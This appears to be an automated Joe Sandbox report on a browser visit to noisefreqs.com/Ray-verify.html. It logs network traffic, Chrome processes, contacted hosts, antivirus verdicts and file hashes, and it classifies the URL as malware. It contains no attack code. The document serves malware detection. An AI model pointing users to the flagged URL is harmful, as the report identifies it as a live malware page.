Source: global trafficHTTP traffic detected: GET /new3.jpg HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.protware.com/home.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /prev.gif HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.protware.com/home.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /next.gif HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.protware.com/home.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /frm.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stat.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /prev.gif HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /new3.jpg HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /next.gif HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /encrypt_html.ico HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.protware.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scroll.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tpmnu.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /encrypt_html.ico HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: noisefreqs.com
Source: global trafficDNS traffic detected: DNS query: www.protware.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Fri, 29 Nov 2024 23:40:18 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 277Connection: close
Source: chromecache_67.2.dr, chromecache_65.2.drString found in binary or memory: http://www.encrypt-html.com
Source: chromecache_65.2.drString found in binary or memory: http://www.encrypt-html.com/_disable_view_source.htm
Source: chromecache_65.2.drString found in binary or memory: http://www.encrypt-html.com/hide_html_source.htm
Source: chromecache_52.2.drString found in binary or memory: http://www.protware.com
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/betatest.htm
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/buy.htm
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/download.htm
Source: chromecache_65.2.dr, chromecache_63.2.drString found in binary or memory: http://www.protware.com/encrypt_asp.htm
Source: chromecache_65.2.drString found in binary or memory: http://www.protware.com/encrypt_html.htm
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/encrypt_html.htm#t00
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/encrypt_javascript.htm
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/faq.htm
Source: chromecache_67.2.drString found in binary or memory: http://www.protware.com/faq1.htm
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/features.htm
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/history.htm
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/html_password_protect.htm
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/image_protection.htm
Source: chromecache_63.2.drString found in binary or memory: http://www.protware.com/support.htm
Source: chromecache_67.2.drString found in binary or memory: http://www.protware.com/tech/
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: classification engineClassification label: mal60.win@17/43@10/5
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 --field-trial-handle=2260,i,4040764079350248205,16213322567652078909,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://noisefreqs.com/Ray-verify.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 --field-trial-handle=2260,i,4040764079350248205,16213322567652078909,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1565470 URL: https://noisefreqs.com/Ray-... Startdate: 30/11/2024 Architecture: WINDOWS Score: 60 24 Antivirus detection for URL or domain 2->24 26 Antivirus / Scanner detection for submitted sample 2->26 28 AI detected suspicious Javascript 2->28 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49723 unknown unknown 6->14 16 239.255.255.250 unknown Reserved 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 protware.com 68.233.44.128, 49752, 49753, 49754 HOSTCOLORUS United States 11->18 20 www.google.com 142.250.181.100, 443, 49738, 49778 GOOGLEUS United States 11->20 22 2 other IPs or domains 11->22

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://noisefreqs.com/Ray-verify.html100%Avira URL Cloudmalware
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.protware.com/frm.js0%Avira URL Cloudsafe
http://www.protware.com/encrypt_html.htm0%Avira URL Cloudsafe
http://www.protware.com/styleIE.css0%Avira URL Cloudsafe
http://www.protware.com/blank.htm0%Avira URL Cloudsafe
http://www.protware.com/betatest.htm0%Avira URL Cloudsafe
http://www.encrypt-html.com/_disable_view_source.htm0%Avira URL Cloudsafe
http://www.protware.com/next.gif0%Avira URL Cloudsafe
http://www.protware.com/home.htm0%Avira URL Cloudsafe
http://www.protware.com/style_M.css0%Avira URL Cloudsafe
http://www.protware.com/menu.htm0%Avira URL Cloudsafe
http://www.encrypt-html.com0%Avira URL Cloudsafe
http://www.protware.com/mm.js0%Avira URL Cloudsafe
http://www.protware.com/html_password_protect.htm0%Avira URL Cloudsafe
http://www.protware.com/download.htm0%Avira URL Cloudsafe
http://www.encrypt-html.com/hide_html_source.htm0%Avira URL Cloudsafe
http://www.protware.com/faq1.htm0%Avira URL Cloudsafe
http://www.protware.com/history.htm0%Avira URL Cloudsafe
http://www.protware.com/encrypt_html.htm#t000%Avira URL Cloudsafe
http://www.protware.com0%Avira URL Cloudsafe
http://www.protware.com/buy.htm0%Avira URL Cloudsafe
http://www.protware.com/new3.jpg0%Avira URL Cloudsafe
http://www.protware.com/encrypt_asp.htm0%Avira URL Cloudsafe
https://noisefreqs.com/favicon.ico100%Avira URL Cloudmalware
http://www.protware.com/features.htm0%Avira URL Cloudsafe
http://www.protware.com/faq.htm0%Avira URL Cloudsafe
http://www.protware.com/encrypt_javascript.htm0%Avira URL Cloudsafe
http://www.protware.com/tech/0%Avira URL Cloudsafe
http://www.protware.com/prev.gif0%Avira URL Cloudsafe
http://www.protware.com/image_protection.htm0%Avira URL Cloudsafe
http://www.protware.com/support.htm0%Avira URL Cloudsafe
http://www.protware.com/scroll.js0%Avira URL Cloudsafe
http://www.protware.com/tpmnu.js0%Avira URL Cloudsafe
http://www.protware.com/encrypt_html.ico0%Avira URL Cloudsafe
http://www.protware.com/stat.js0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
protware.com
68.233.44.128
truefalse
    unknown
    www.google.com
    142.250.181.100
    truefalse
      high
      noisefreqs.com
      166.1.209.92
      truefalse
        high
        www.protware.com
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          http://www.protware.com/styleIE.cssfalse
          • Avira URL Cloud: safe
          unknown
          http://www.protware.com/menu.htmfalse
          • Avira URL Cloud: safe
          unknown
          http://www.protware.com/frm.jsfalse
          • Avira URL Cloud: safe
          unknown
          http://www.protware.com/home.htmfalse
          • Avira URL Cloud: safe
          unknown
          http://www.protware.com/style_M.cssfalse
          • Avira URL Cloud: safe
          unknown
          http://www.protware.com/blank.htmfalse
          • Avira URL Cloud: safe
          unknown
          http://www.protware.com/next.giffalse
          • Avira URL Cloud: safe
          unknown
          http://www.protware.com/mm.jsfalse
          • Avira URL Cloud: safe
          unknown
          http://www.protware.com/false
            unknown
            https://noisefreqs.com/favicon.icofalse
            • Avira URL Cloud: malware
            unknown
            http://www.protware.com/new3.jpgfalse
            • Avira URL Cloud: safe
            unknown
            https://noisefreqs.com/Ray-verify.htmltrue
              unknown
              http://www.protware.com/prev.giffalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/tpmnu.jsfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/stat.jsfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/scroll.jsfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/encrypt_html.icofalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.protware.com/encrypt_html.htmchromecache_65.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.encrypt-html.com/_disable_view_source.htmchromecache_65.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/betatest.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/html_password_protect.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.encrypt-html.comchromecache_67.2.dr, chromecache_65.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.encrypt-html.com/hide_html_source.htmchromecache_65.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/faq1.htmchromecache_67.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/encrypt_html.htm#t00chromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.comchromecache_52.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/download.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/history.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/buy.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/encrypt_asp.htmchromecache_65.2.dr, chromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/features.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/faq.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/encrypt_javascript.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/tech/chromecache_67.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/image_protection.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              http://www.protware.com/support.htmchromecache_63.2.drfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              239.255.255.250
              unknownReserved
              unknownunknownfalse
              166.1.209.92
              noisefreqs.comUnited States
              11798ACEDATACENTERS-AS-1USfalse
              68.233.44.128
              protware.comUnited States
              46873HOSTCOLORUSfalse
              142.250.181.100
              www.google.comUnited States
              15169GOOGLEUSfalse
              IP
              192.168.2.4
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1565470
              Start date and time:2024-11-30 00:39:17 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 2m 50s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:browseurl.jbs
              Sample URL:https://noisefreqs.com/Ray-verify.html
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal60.win@17/43@10/5
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 172.217.19.238, 74.125.205.84, 216.58.208.227, 34.104.35.123, 199.232.214.172, 192.229.221.95, 172.217.17.67
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: https://noisefreqs.com/Ray-verify.html
              No simulations
              No context
              No context
              No context
              No context
              No context
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):662
              Entropy (8bit):5.187979360123791
              Encrypted:false
              SSDEEP:12:uMXlV1kDRZgKq2jhZzBAqhIaiCKIC9JHuvMhoduUGhaxhS:uMVV1YRZgKThZz+iuC3xvMhAS
              MD5:699C66BB87E9F0BA1B3F66DD446399A3
              SHA1:7242EC04D215404B99DE2EAB1B2677CC52AF52DA
              SHA-256:77BC94DED024040B9700E868587A57C1F4B1B7C7AD29003E61DC7CA792C7395D
              SHA-512:1D1B8FFBD64E82B9F1A47EFFDD097FD0342D3324BC12E2A8AF0F17A782776FD5329C454CF83E578979DB775557D027B28EE5C5384592A8F8710C3A265362A0EF
              Malicious:false
              Reputation:low
